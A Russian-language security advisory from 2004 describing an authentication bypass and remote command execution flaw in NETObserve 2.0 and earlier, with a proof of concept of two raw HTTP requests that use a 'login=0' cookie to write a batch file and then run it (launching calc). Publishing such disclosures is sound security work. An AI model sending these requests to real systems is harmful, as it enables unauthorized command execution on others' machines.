Удаленное выполнение произвольного кода в NETObserve

Дата публикации:
04.01.2004
Всего просмотров:
983
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Обход ограничений безопасности
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
NETObserve 1.x
NETObserve 2.x
Уязвимые версии: NETObserve 2.0 и более ранние версии

Описание: Уязвимость обнаружена в NETObserve. Удаленный пользователь может выполнить произвольные команды на целевой системе.

Удаленный пользователь может подключиться к целевой системе, используя специально обработанный HTTP заголовок, чтобы внедриться в административную сессию.

Пример/Эксплоит:

REQUEST #1:

--------------------------------------------------------------------------
POST /sendeditfile HTTP/1.1
Accept: */*
Referer: http://127.0.0.1/editfile=?C:\WINDOWS\win.bat?
Content-Type: application/x-www-form-urlencoded
Host: AnyHostWillDo
Content-Length: 25
Cookie: login=0

newfiledata=cmd+%2Fc+calc
--------------------------------------------------------------------------

REQUEST #2:

--------------------------------------------------------------------------
GET /runfile=?C:\windows\win.bat? HTTP/1.1
Accept: */*
Host: AnyHostWillDo
Cookie: login=0


--------------------------------------------------------------------------

URL производителя: http://www.exploreanywhere.com/no-intro.php

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: NetObserve Security Bypass Vulnerability

или введите имя

CAPTCHA